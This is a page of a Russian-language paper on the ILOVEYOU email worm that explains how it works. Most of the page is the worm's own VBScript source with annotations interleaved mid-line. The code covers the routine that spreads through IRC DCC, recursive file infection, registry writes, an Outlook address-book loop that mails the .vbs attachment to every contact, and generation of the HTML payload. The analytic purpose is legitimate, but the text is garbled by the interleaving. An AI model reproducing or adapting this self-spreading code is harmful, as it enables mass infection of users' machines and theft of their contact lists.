Интернет – червь I LOVE YOU (LOVE LETTER FOR YOU). Принцип работы. Меры безопасности для защиты от заражения и предотвращения деструктивных действий — страница 9

  • Просмотров 3482
  • Скачиваний 269
  • Размер файла 48
    Кб

scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" Эта часть скрипта осуществляет рассылку всем scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" участникам чата копии вируса в виде HTM файла [13] scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) Вирус запоминает пути к зараженным файлам set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub --------Подпрограмма создания ключа в реестре

----------- sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") Запись ключа в реестр regedit.RegWrite regkey,regvalue end sub -------------Подпрограмма чтения ключа в реестр ----------- function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) Проверка записи ключа в реестр end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) Данной процедурой вирус подготавливает отправку сообщений со своей копией по

электронной почте. On Error Resume Next [14] dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function =================Процедура рассылки копий вируса по электронной почте ============= sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") Вирус получает доступ к адресной книге программы Outlook Express.[15] for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1

regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) Организуется цикл для рассылки по всем адресам адресной книги [16] regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) Вирус создает тело письма с адресом отправителя, темой и male.Recipients.Add(malead) текстом. [17] male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming

from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") Присоединяет к письму файл с телом вируса [18] male.Send Отсылает письмо адресату regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else Если нет адресной книги, то письма не создаются regedit.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\WAB\”&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub ============Процедура создания HTM страницы========== sub html On Error

Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@